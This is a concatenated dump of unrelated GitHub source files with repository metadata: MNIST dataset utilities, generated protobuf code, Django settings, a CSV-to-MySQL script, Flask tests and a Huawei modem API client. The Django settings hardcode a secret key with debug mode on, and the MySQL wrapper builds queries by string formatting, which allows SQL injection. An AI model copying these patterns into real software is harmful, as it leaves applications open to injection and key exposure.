for fname in (self.TRAIN_FILE_NAME, self.TEST_FILE_NAME):
existing = existing and os.path.isfile(os.path.join(data_folder, fname))
return existing
def prepare_data(self, download: bool):
if download:
self._download(self.cached_folder_path)
def _download(self, data_folder: str) -> None:
"""Download the MNIST data if it doesn't exist in cached_folder_path already."""
if self._check_exists(data_folder):
return
os.makedirs(data_folder, exist_ok=True)
for url in self.RESOURCES:
logging.info(f'Downloading {url}')
fpath = os.path.join(data_folder, os.path.basename(url))
urllib.request.urlretrieve(url, fpath)
def _try_load(path_data, trials: int = 30, delta: float = 1.):
"""Resolving loading from the same time from multiple concurrentprocesses."""
res, exp = None, None
assert trials, "at least some trial has to be set"
assert os.path.isfile(path_data), 'missing file: %s' % path_data
for _ in range(trials):
try:
res = torch.load(path_data)
except Exception as ex:
exp = ex
time.sleep(delta * random.random())
else:
break
else:
# raise the caught exception if any
if exp:
raise exp
return res
def normalize_tensor(tensor: Tensor, mean: float = 0.0, std: float = 1.0) -> Tensor:
tensor = tensor.clone()
mean = torch.as_tensor(mean, dtype=tensor.dtype, device=tensor.device)
std = torch.as_tensor(std, dtype=tensor.dtype, device=tensor.device)
tensor.sub_(mean).div_(std)
return tensor
class TrialMNIST(MNIST):
"""Constrain image dataset
Args:
root: Root directory of dataset where ``MNIST/processed/training.pt``
and ``MNIST/processed/test.pt`` exist.
train: If ``True``, creates dataset from ``training.pt``,
otherwise from ``test.pt``.
normalize: mean and std deviation of the MNIST dataset.
download: If true, downloads the dataset from the internet and
puts it in root directory. If dataset is already downloaded, it is not
downloaded again.
num_samples: number of examples per selected class/digit
digits: list selected MNIST digits/classes
Examples:
>>> dataset = TrialMNIST(download=True)
>>> len(dataset)
300
>>> sorted(set([d.item() for d in dataset.targets]))
[0, 1, 2]
>>> torch.bincount(dataset.targets)
tensor([100, 100, 100])
"""
def __init__(
self,
root: str = PATH_DATASETS,
train: bool = True,
normalize: tuple = (0.5, 1.0),
download: bool = False,
num_samples: int = 100,
digits: Optional[Sequence] = (0, 1, 2),
):
# number of examples per class
self.num_samples = num_samples
# take just a subset of MNIST dataset
self.digits = digits if digits else list(range(10))
self.cache_folder_name = 'digits-' + '-'.join(str(d) for d in sorted(self.digits)) \
+ f'_nb-{self.num_samples}'
super().__init__(
root,
train=train,
normalize=normalize,
download=download
)
@staticmethod
def _prepare_subset(full_data: torch.Tensor, full_targets: torch.Tensor,
num_samples: int, digits: Sequence):
classes = {d: 0 for d in digits}
indexes = []
for idx, target in enumerate(full_targets):
label = target.item()
if classes.get(label, float('inf')) >= num_samples:
continue
indexes.append(idx)
classes[label] += 1
if all(classes[k] >= num_samples for k in classes):
break
data = full_data[indexes]
targets = full_targets[indexes]
return data, targets
def prepare_data(self, download: bool) -> None:
if self._check_exists(self.cached_folder_path):
return
if download:
self._download(super().cached_folder_path)
for fname in (self.TRAIN_FILE_NAME, self.TEST_FILE_NAME):
path_fname = os.path.join(super().cached_folder_path, fname)
assert os.path.isfile(path_fname), 'Missing cached file: %s' % path_fname
data, targets = _try_load(path_fname)
data, targets = self._prepare_subset(data, targets, self.num_samples, self.digits)
torch.save((data, targets), os.path.join(self.cached_folder_path, fname))
class AverageDataset(Dataset):
def __init__(self, dataset_len=300, sequence_len=100):
self.dataset_len = dataset_len
self.sequence_len = sequence_len
self.input_seq = torch.randn(dataset_len, sequence_len, 10)
top, bottom = self.input_seq.chunk(2, -1)
self.output_seq = top + bottom.roll(shifts=1, dims=-1)
def __len__(self):
return self.dataset_len
def __getitem__(self, item):
return self.input_seq[item], self.output_seq[item]
|
[
"noreply@github.com"
] |
jtamir.noreply@github.com
|
58d3cfda83ea5046fc57e7c8de3e95fa26d4f198
|
555b9f764d9bca5232360979460bc35c2f5ad424
|
/google/ads/google_ads/v2/proto/resources/ad_group_audience_view_pb2.py
|
26b4ed14fc842a81e3edeec29f2158892b497c43
|
[
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
juanmacugat/google-ads-python
|
b50256163782bc0223bcd8b29f789d74f4cfad05
|
0fc8a7dbf31d9e8e2a4364df93bec5f6b7edd50a
|
refs/heads/master
| 2021-02-18T17:00:22.067673
| 2020-03-05T16:13:57
| 2020-03-05T16:13:57
| 245,215,877
| 1
| 0
|
Apache-2.0
| 2020-03-05T16:39:34
| 2020-03-05T16:39:33
| null |
UTF-8
|
Python
| false
| true
| 3,716
|
py
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads_v2/proto/resources/ad_group_audience_view.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads_v2/proto/resources/ad_group_audience_view.proto',
package='google.ads.googleads.v2.resources',
syntax='proto3',
serialized_options=_b('\n%com.google.ads.googleads.v2.resourcesB\030AdGroupAudienceViewProtoP\001ZJgoogle.golang.org/genproto/googleapis/ads/googleads/v2/resources;resources\242\002\003GAA\252\002!Google.Ads.GoogleAds.V2.Resources\312\002!Google\\Ads\\GoogleAds\\V2\\Resources\352\002%Google::Ads::GoogleAds::V2::Resources'),
serialized_pb=_b('\nDgoogle/ads/googleads_v2/proto/resources/ad_group_audience_view.proto\x12!google.ads.googleads.v2.resources\x1a\x1cgoogle/api/annotations.proto\",\n\x13\x41\x64GroupAudienceView\x12\x15\n\rresource_name\x18\x01 \x01(\tB\x85\x02\n%com.google.ads.googleads.v2.resourcesB\x18\x41\x64GroupAudienceViewProtoP\x01ZJgoogle.golang.org/genproto/googleapis/ads/googleads/v2/resources;resources\xa2\x02\x03GAA\xaa\x02!Google.Ads.GoogleAds.V2.Resources\xca\x02!Google\\Ads\\GoogleAds\\V2\\Resources\xea\x02%Google::Ads::GoogleAds::V2::Resourcesb\x06proto3')
,
dependencies=[google_dot_api_dot_annotations__pb2.DESCRIPTOR,])
_ADGROUPAUDIENCEVIEW = _descriptor.Descriptor(
name='AdGroupAudienceView',
full_name='google.ads.googleads.v2.resources.AdGroupAudienceView',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='resource_name', full_name='google.ads.googleads.v2.resources.AdGroupAudienceView.resource_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=137,
serialized_end=181,
)
DESCRIPTOR.message_types_by_name['AdGroupAudienceView'] = _ADGROUPAUDIENCEVIEW
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
AdGroupAudienceView = _reflection.GeneratedProtocolMessageType('AdGroupAudienceView', (_message.Message,), dict(
DESCRIPTOR = _ADGROUPAUDIENCEVIEW,
__module__ = 'google.ads.googleads_v2.proto.resources.ad_group_audience_view_pb2'
,
__doc__ = """An ad group audience view. Includes performance data from interests and
remarketing lists for Display Network and YouTube Network ads, and
remarketing lists for search ads (RLSA), aggregated at the audience
level.
Attributes:
resource_name:
The resource name of the ad group audience view. Ad group
audience view resource names have the form: ``customers/{cust
omer_id}/adGroupAudienceViews/{ad_group_id}~{criterion_id}``
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.resources.AdGroupAudienceView)
))
_sym_db.RegisterMessage(AdGroupAudienceView)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
[
"noreply@github.com"
] |
juanmacugat.noreply@github.com
|
b8d7a150c280b459d3c7bafaf2ca31069f0f0ff3
|
0830734d5c73de8b25599f653688e57d1859e020
|
/cs387/settings.py
|
1017a8d6c76f27f81d2537649ceaaaa017360eaf
|
[] |
no_license
|
hbhoyar/badluShop
|
6e90afa5017a0baa4026fc5a8e3ddb36802d49a7
|
5735401ae8467bfbaf42df648f55cf1a119aa3e2
|
refs/heads/master
| 2022-04-17T23:46:20.105864
| 2020-02-26T04:59:37
| 2020-02-26T04:59:37
| 238,782,355
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,310
|
py
|
"""
Django settings for cs387 project.
Generated by 'django-admin startproject' using Django 3.0.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '*)m*0%&h_!q-@d51_%ycsu6d&cfko)z@05&-6hqlgiot$i-on8'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'cs387.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'cs387.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME' : 'lab3',
'USER' : 'hbhoyar',
'PASSWORD': '',
'HOST': 'localhost',
'PORT': '5432',
},
'sqlite3': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
|
[
"shantanubhoyar02@gmail.com"
] |
shantanubhoyar02@gmail.com
|
56cc543721a5b79b5868f04319f7b73cc77938e1
|
313bb88c43d74995e7426f9482c6c8e670fdb63c
|
/08-exceptions/example3.py
|
1d5bd8590e2c604e419ba991a4bc99737535992e
|
[] |
no_license
|
martakedzior/python-course
|
8e93fcea3e9e1cb51920cb1fcf3ffbb310d1d654
|
3af2296c2092023d91ef5ff3b4ef9ea27ec2f227
|
refs/heads/main
| 2023-05-06T07:26:58.452520
| 2021-05-26T16:50:26
| 2021-05-26T16:50:26
| 339,822,876
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 67
|
py
|
class CustomError(Exception):
pass
raise CustomError('hahaha')
|
[
"marta.kedzior@wp.pl"
] |
marta.kedzior@wp.pl
|
3ed29339d5785d160aa96ad1794ebea9be5a8ceb
|
57c54c0735c496456f03757d4d6ce934707483bf
|
/build/moveit/moveit_planners/ompl/catkin_generated/pkg.installspace.context.pc.py
|
9dc432cf44ba1f6cf8bb517943816fc5f44b28ee
|
[] |
no_license
|
ahmedgamalhasan/catkin_ws
|
a7e0faf4efcaf833afcac4bdff68974542c17ec1
|
d68a25c7a7d81748e4a2c08a82a5acf60310c909
|
refs/heads/main
| 2023-08-20T06:17:53.054329
| 2021-10-16T12:31:01
| 2021-10-16T12:31:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,022
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "${prefix}/include;/opt/ros/noetic/include/ompl-1.5;/usr/include;/usr/include/eigen3".split(';') if "${prefix}/include;/opt/ros/noetic/include/ompl-1.5;/usr/include;/usr/include/eigen3" != "" else []
PROJECT_CATKIN_DEPENDS = "dynamic_reconfigure;moveit_core;roscpp".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lmoveit_ompl_interface;/opt/ros/noetic/lib/x86_64-linux-gnu/libompl.so;/usr/lib/x86_64-linux-gnu/libboost_serialization.so;/usr/lib/x86_64-linux-gnu/libboost_filesystem.so;/usr/lib/x86_64-linux-gnu/libboost_system.so".split(';') if "-lmoveit_ompl_interface;/opt/ros/noetic/lib/x86_64-linux-gnu/libompl.so;/usr/lib/x86_64-linux-gnu/libboost_serialization.so;/usr/lib/x86_64-linux-gnu/libboost_filesystem.so;/usr/lib/x86_64-linux-gnu/libboost_system.so" != "" else []
PROJECT_NAME = "moveit_planners_ompl"
PROJECT_SPACE_DIR = "/home/ahmed2/catkin_ws/install"
PROJECT_VERSION = "1.1.5"
|
[
"ahmedagh2013@live.com"
] |
ahmedagh2013@live.com
|
e5fc5f00fd14a45cd84e931f7688de9dc9f1f1d1
|
e23a4f57ce5474d468258e5e63b9e23fb6011188
|
/115_testing/examples/Github/_Level_2/unittest-master/python/csv_db.py
|
786e3e036143a86b8c363cf013bd10f92db6061b
|
[] |
no_license
|
syurskyi/Python_Topics
|
52851ecce000cb751a3b986408efe32f0b4c0835
|
be331826b490b73f0a176e6abed86ef68ff2dd2b
|
refs/heads/master
| 2023-06-08T19:29:16.214395
| 2023-05-29T17:09:11
| 2023-05-29T17:09:11
| 220,583,118
| 3
| 2
| null | 2023-02-16T03:08:10
| 2019-11-09T02:58:47
|
Python
|
UTF-8
|
Python
| false
| false
| 5,718
|
py
|
# finalproject.py
# @author: Shubham Sachdeva
# @email:
# @date: 18-13-09
# reads data from input.csv
# For simplicity reads only ['GEO'], ['DGUID'], ['Food categories'], ['Commodity'] fields
# class Product - a class defining a record
# def read_csv - function that reads data from given file
import csv
import _mysql
import bisect
CONST_AUTHOR = "Shubham Sachdeva"
# Uses mysql database connection.
# Class Database simply wraps basic CRUD operations.
# @author: Shubham Sachdeva
class Database:
# Establishing a mysql connection
def __init__(self):
self.db = _mysql.connect("localhost", "root", "root", "student")
self._tablename = ""
# insert a record
def create(self, product):
query = ("INSERT INTO %s (geo, guid, category, commodity) VALUES('%s', '%s', '%s', '%s')" %
(self._tablename, product.geo, product.guid, product.category, product.commodity))
self.db.query(query)
# update a record based on id
def update(self, id, product):
query = ("UPDATE %s SET geo='%s', guid='%s', category='%s', commodity='%s' WHERE id=%d" %
(self._tablename, product.geo, product.guid, product.category, product.commodity, product.id))
self.db.query(query)
# get a record based on id
def read(self, id):
query = "SELECT * FROM %s WHERE id=%d" % (self._tablename, id)
self.db.query(query)
r = self.db.store_result()
product = Product()
for i in r.fetch_row(maxrows=1):
product.id = int(i[0])
product.geo = i[1]
product.guid = i[2]
product.category = i[3]
product.commodity = i[4]
return product
# delete a record based on id
def delete(self, id):
self.db.query("""DELETE FROM %s WHERE id=%d""" % (self._tablename, id))
# create table if it doesn't exist
def select_table(self, tablename):
self.db.query(
"CREATE TABLE IF NOT EXISTS " + tablename + " (`id` INT NOT NULL AUTO_INCREMENT , "
"`geo` VARCHAR(30) NOT NULL , "
"`guid` VARCHAR(30) NOT NULL , "
"`category` VARCHAR(100) NOT NULL , "
"`commodity` VARCHAR(100) NOT NULL , "
"PRIMARY KEY (`id`)) ENGINE = InnoDB;")
self._tablename = tablename
# custom sort function
# sort by guid
# @author: Shubham Sachdeva
def cmpFn(obj):
return obj.guid
# Class List - Custom list using standard list API library.
# Member function find and reverse_find returns index of given element.
# While find returns leftmost position, reverse_find returns rightmost position.
# This assumes that the list is sorted.
# @author: Shubham Sachdeva
class List:
def __init__(self):
self.lst = []
self.lstguid = []
def append(self, obj):
self.lst.append(obj)
def sort(self):
self.lst = sorted(self.lst, key=cmpFn)
self.lstguid = [obj.guid for obj in self.lst ]
def find(self, guid):
return bisect.bisect_left(self.lstguid, guid)
def reverse_find(self, guid):
return bisect.bisect_right(self.lstguid, guid)
# list iterator
# ListIterator simply operates on a list of primitive types.
# @author: Shubham Sachdeva
class ListIterator:
def __init__(self, lst):
self.lst = lst
self.cur = 0
def get(self):
if self.cur >=0 and self.cur < len(self.lst):
return self.lst[self.cur]
else:
return None
def next(self):
if self.cur < len(self.lst) -1:
self.cur += 1
return True
else:
return False
def prev(self):
if self.cur > 0:
self.cur -= 1
return True
else:
return False
def info(self):
return str(self.get())
# inherited from ListIterator
# Member function info has been overriden.
# @author: Shubham Sachdeva
class ObjectListIterator(ListIterator):
def info(self):
obj = self.get()
if obj == None:
return "None"
return "Current Object: " + ("%d\t%s\t%s\t%s\t%s" % (self.id, self.geo, self.guid, self.category, self.commodity))
# @author: Shubham Sachdeva
class Product:
# initialisation
def __init__(self, geo, guid, category, commodity):
self.id = 0
self.geo = geo
self.guid = guid
self.category = category
self.commodity = commodity
# for print
def __str__(self):
return ("%d\t%s\t%s\t%s\t%s" % (self.id, self.geo, self.guid, self.category, self.commodity))
# reads 4 fields from given file
# @author: Shubham Sachdeva
def read_csv(file_name):
lst = []
try:
with open(file_name, newline='', encoding='utf-8') as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
product = Product(row['GEO'], row['DGUID'], row['Food categories'], row['Commodity'])
print (product)
lst.append(product)
except:
print ('read_csv failed')
return lst
# @author: Shubham Sachdeva
def main():
lst = read_csv('input.csv')
n = len(lst)
db = Database()
db.select_table('products')
for item in lst:
db.create(item)
print ("Created " + str(len(lst)) + " items");
print("Programmed by " + CONST_AUTHOR)
if __name__ == '__main__':
print (CONST_AUTHOR)
main()
|
[
"sergejyurskyj@yahoo.com"
] |
sergejyurskyj@yahoo.com
|
debf360fa987a6e58b701bbad0d9e2b2366bcb22
|
6b28dab8b7a9db261f3cb78dce83bee9ea6e4228
|
/graziela/Modulo3/Aula4/Exemplo5.py
|
11e9d4c4346bb78c941ae51bb8090aaae6078f8c
|
[] |
no_license
|
grazielags/cp12
|
359bc95cdb478b7b5bd1b347593df15e60060338
|
2ed2f5164d9f3acae6b6e8fccadf5609fb1da7eb
|
refs/heads/master
| 2020-06-14T06:48:42.842554
| 2019-10-09T02:09:13
| 2019-10-09T02:09:13
| 194,937,381
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 260
|
py
|
# inicializa vetor de notas com 0
notas = [0] * 3
soma = 0
# preenche vetor de notas, sem usar append
for i in range(3):
notas[i] = eval(input("Digite a nota do aluno " + str(i) + ": "))
soma = soma + notas[i]
print("A média da turma é: ", soma/3)
|
[
"graziela@gmail.com"
] |
graziela@gmail.com
|
7059490dec787f11a2313b25aa4c4e3700fe331d
|
a8d693031e9ea97e19cb2727c15bdea83eb27fa8
|
/tests/test_basics.py
|
4a1255a3053392e3277a694d2e4751b3922d91a4
|
[] |
no_license
|
hoffrenm/lukuvinkkikirjasto
|
f5d8047c223efe7f95a9acbdfdb6f5b1151eccee
|
94623dd557d278abc033c29f108eb84fcda171d8
|
refs/heads/master
| 2022-12-15T20:20:30.718292
| 2020-05-06T11:48:26
| 2020-05-06T11:48:26
| 252,186,207
| 0
| 0
| null | 2022-12-08T03:58:13
| 2020-04-01T13:41:11
|
Python
|
UTF-8
|
Python
| false
| false
| 610
|
py
|
import unittest
from flask import current_app
from application import create_app, db
class BasicsTestCase(unittest.TestCase):
def setUp(self):
self.app = create_app('testing')
self.app_context = self.app.app_context()
self.app_context.push()
with self.app.app_context():
db.create_all()
def tearDown(self):
db.session.remove()
db.drop_all()
self.app_context.pop()
def test_app_exists(self):
self.assertFalse(current_app is None)
def test_app_is_testing(self):
self.assertTrue(current_app.config['TESTING'])
|
[
"ijmakine@gmail.com"
] |
ijmakine@gmail.com
|
c6c0632c3c5c78c8fbed26e8ad96a6bc3aead190
|
e4b5c93b3efcc084a0fdd3a66288b089d5ebe6c6
|
/huawei_interface.py
|
bfb8715d9362667091681e6f0f4626bd07b21c41
|
[
"MIT"
] |
permissive
|
frillip/field-control-panel
|
d3cbaba974aee74dd1cedacd54a4c30c8cd42bc5
|
57bff153750a7f80c68985786d2c2a15ce2030db
|
refs/heads/master
| 2022-05-27T05:52:10.304126
| 2022-05-11T21:37:01
| 2022-05-11T21:37:01
| 211,827,798
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,682
|
py
|
import requests
import xmltodict
from time import sleep
import global_vars
from yaml_config import config
import logging
import colorlog
logger = colorlog.getLogger(__name__)
logger.addHandler(global_vars.file_handler)
logger.addHandler(global_vars.handler)
logger.setLevel(global_vars.log_level)
def get_auth_data():
token_info_api_url="http://" + config['huawei']['dongle_ip'] + "/api/webserver/SesTokInfo"
try:
token_resp = requests.get(token_info_api_url)
if "SessionID" in token_resp.text:
token=xmltodict.parse(token_resp.content)['response']
token_secret=token["TokInfo"]
session_id=token["SesInfo"]
auth_data = { "session_id": session_id, "token_secret": token_secret }
return auth_data
else:
logger.error("Modem auth data request failed: " + token_resp.text)
return False
except Exception as e:
logger.error("Modem auth data request failed: " + str(e))
def construct_auth_headers(auth_data):
headers = {"Content-Type": "text/xml; charset=UTF-8",
"Cookie": auth_data['session_id'],
"__RequestVerificationToken": auth_data['token_secret']}
return headers
def send_connection_req():
req_connection_api_url="http://" + config['huawei']['dongle_ip'] + "/api/dialup/dial"
connection_req_xml = '<?xml version="1.0" encoding="UTF-8"?><request><Action>1</Action></request>'
try:
logger.warning("Sending connection request to modem")
auth_data=get_auth_data()
if auth_data:
headers = construct_auth_headers(auth_data)
post_req = requests.post(req_connection_api_url, headers=headers, data=connection_req_xml)
if "OK" in post_req.text:
logger.warning("Connection request made OK!")
return True
else:
logger.error("Modem connection request failed: " + post_req.text)
return False
except Exception as e:
logger.error("Modem connection request failed: " + str(e))
def send_reboot_req():
req_reboot_api_url="http://" + config['huawei']['dongle_ip'] + "/api/device/control"
reboot_req_xml = '<?xml version="1.0" encoding="UTF-8"?><request><Control>1</Control></request>'
try:
logger.warning("Sending reboot request to modem")
auth_data=get_auth_data()
if auth_data:
headers = construct_auth_headers(auth_data)
post_req = requests.post(req_reboot_api_url, headers=headers, data=reboot_req_xml)
if "OK" in post_req.text:
logger.warning("Modem rebooting!")
return True
else:
logger.error("Modem reboot request failed: " + post_req.text)
return False
except Exception as e:
logger.error("Modem reboot request failed: " + str(e))
def send_reset_stats():
req_clear_traffic_api_url="http://" + config['huawei']['dongle_ip'] + "/api/monitoring/clear-traffic"
clear_traffic_req_xml = '<?xml version="1.0" encoding="UTF-8"?><request><ClearTraffic>1</ClearTraffic></request>'
try:
logger.warning("Sending traffic statis reset request to modem")
auth_data=get_auth_data()
if auth_data:
headers = construct_auth_headers(auth_data)
post_req = requests.post(req_clear_traffic_api_url, headers=headers, data=clear_traffic_req_xml)
if "OK" in post_req.text:
logger.warning("Traffic stats cleared!")
return True
else:
logger.error("Traffic stats reset request failed: " + post_req.text)
return False
except Exception as e:
logger.error("Traffic stats reset request failed: " + str(e))
def get_modem_data():
get_dev_info_api_url="http://" + config['huawei']['dongle_ip'] + "/api/device/information"
get_net_name_api_url="http://" + config['huawei']['dongle_ip'] + "/api/net/current-plmn"
get_mon_stat_api_url="http://" + config['huawei']['dongle_ip'] + "/api/monitoring/status"
get_mon_traf_api_url="http://" + config['huawei']['dongle_ip'] + "/api/monitoring/traffic-statistics"
get_mon_data_plan_api_url="http://" + config['huawei']['dongle_ip'] + "/api/monitoring/start_date"
get_mon_data_stats_api_url="http://" + config['huawei']['dongle_ip'] + "/api/monitoring/month_statistics"
try:
auth_data=get_auth_data()
if auth_data:
headers = construct_auth_headers(auth_data)
dev_info_resp = requests.get(get_dev_info_api_url, headers=headers)
if "DeviceName" in dev_info_resp.text:
dev_info = xmltodict.parse(dev_info_resp.content)['response']
global_vars.modem_data["device_name"] = dev_info["DeviceName"]
else:
logger.error("Modem task failed: could not retrieve " + get_dev_info_api_url)
net_name_resp = requests.get(get_net_name_api_url, headers=headers)
if "FullName" in net_name_resp.text:
net_name = xmltodict.parse(net_name_resp.content)['response']
global_vars.modem_data["network_name"] = net_name["FullName"]
else:
logger.error("Modem task failed: could not retrieve " + get_net_name_api_url)
mon_stat_resp = requests.get(get_mon_stat_api_url, headers=headers)
if "ConnectionStatus" in mon_stat_resp.text:
mon_stat = xmltodict.parse(mon_stat_resp.content)['response']
global_vars.modem_data["signal_strength"] = int(mon_stat["SignalIcon"])
global_vars.modem_data["wan_ip"] = mon_stat["WanIPAddress"]
net_type_ex=int(mon_stat["CurrentNetworkTypeEx"])
if net_type_ex == 0:
global_vars.modem_data["network_type"] = "No Service"
elif net_type_ex == 1:
global_vars.modem_data["network_type"] = "GSM"
elif net_type_ex == 2:
global_vars.modem_data["network_type"] = "GPRS"
elif net_type_ex == 3:
global_vars.modem_data["network_type"] = "EDGE"
elif net_type_ex == 41:
global_vars.modem_data["network_type"] = "WCDMA"
elif net_type_ex == 42:
global_vars.modem_data["network_type"] = "HSDPA"
elif net_type_ex == 43:
global_vars.modem_data["network_type"] = "HSUPA"
elif net_type_ex == 44:
global_vars.modem_data["network_type"] = "HSPA"
elif net_type_ex == 45:
global_vars.modem_data["network_type"] = "HSPA+"
elif net_type_ex == 46:
global_vars.modem_data["network_type"] = "HSPA+"
elif net_type_ex == 62:
global_vars.modem_data["network_type"] = "HSDPA"
elif net_type_ex == 63:
global_vars.modem_data["network_type"] = "HSUPA"
elif net_type_ex == 64:
global_vars.modem_data["network_type"] = "HSPA"
elif net_type_ex == 65:
global_vars.modem_data["network_type"] = "HSPA+"
elif net_type_ex == 101:
global_vars.modem_data["network_type"] = "LTE"
else:
global_vars.modem_data["network_type"] = "Unknown"
if mon_stat["ConnectionStatus"] == "901":
global_vars.modem_data["connected"] = True
else:
global_vars.modem_data["connected"] = False
else:
logger.error("Modem task failed: could not retrieve " + get_mon_stat_api_url)
mon_traf_resp = requests.get(get_mon_traf_api_url, headers=headers)
if "CurrentConnectTime" in mon_traf_resp.text:
mon_traf = xmltodict.parse(mon_traf_resp.content)['response']
global_vars.modem_data["data_usage"]["current"]["up"] = int(mon_traf["CurrentUpload"])
global_vars.modem_data["data_usage"]["current"]["down"] = int(mon_traf["CurrentDownload"])
global_vars.modem_data["data_usage"]["current"]["rate_up"] = int(mon_traf["CurrentUploadRate"])
global_vars.modem_data["data_usage"]["current"]["rate_down"] = int(mon_traf["CurrentDownloadRate"])
global_vars.modem_data["data_usage"]["current"]["connected_time"] = int(mon_traf["CurrentConnectTime"])
global_vars.modem_data["data_usage"]["total"]["up"] = int(mon_traf["TotalUpload"])
global_vars.modem_data["data_usage"]["total"]["down"] = int(mon_traf["TotalDownload"])
global_vars.modem_data["data_usage"]["total"]["connected_time"] = int(mon_traf["TotalConnectTime"])
else:
logger.error("Modem task failed: could not retrieve " + get_mon_traf_api_url)
mon_data_stats_resp = requests.get(get_mon_data_stats_api_url, headers=headers)
if "MonthDuration" in mon_data_stats_resp.text:
mon_data_stats = xmltodict.parse(mon_data_stats_resp.content)['response']
global_vars.modem_data["data_usage"]["month"]["up"] = int(mon_data_stats["CurrentMonthUpload"])
global_vars.modem_data["data_usage"]["month"]["down"] = int(mon_data_stats["CurrentMonthDownload"])
global_vars.modem_data["data_usage"]["month"]["connected_time"] = int(mon_data_stats["MonthDuration"])
else:
logger.error("Modem task failed: could not retrieve " + get_mon_data_stats_api_url)
mon_data_plan_resp = requests.get(get_mon_data_plan_api_url, headers=headers)
if "StartDay" in mon_data_plan_resp.text:
mon_data_plan = xmltodict.parse(mon_data_plan_resp.content)['response']
global_vars.modem_data["data_usage"]["month"]["start_day"] = int(mon_data_plan["StartDay"])
global_vars.modem_data["data_usage"]["month"]["limit"] = int(mon_data_plan["trafficmaxlimit"])
else:
logger.error("Modem task failed: could not retrieve " + get_mon_data_plan_api_url)
except Exception as e:
logger.error("Modem task failed: " + str(e))
pass
def send_sms(dest,message):
send_sms_api_url="http://" + config['huawei']['dongle_ip'] + "/api/sms/send-sms"
try:
auth_data=get_auth_data()
if auth_data:
headers = construct_auth_headers(auth_data)
xml_data = """<?xml version='1.0' encoding='UTF-8'?>
<request><Index>-1</Index><Phones><Phone>""" + dest + \
"""</Phone></Phones><Sca></Sca><Content>""" + message + \
"""</Content><Length>-1</Length><Reserved>1</Reserved>
<Date>-1</Date></request>"""
send_sms_resp = requests.post(send_sms_api_url, data=xml_data, headers=headers)
if "OK" in send_sms_resp.text:
logger.warning("SMS sent to " + dest)
return True
else:
logger.error("SMS send failed: " + send_sms_resp.text)
return False
except Exception as e:
logger.error("SMS send failed: " + str(e))
return False
def net_connected():
try:
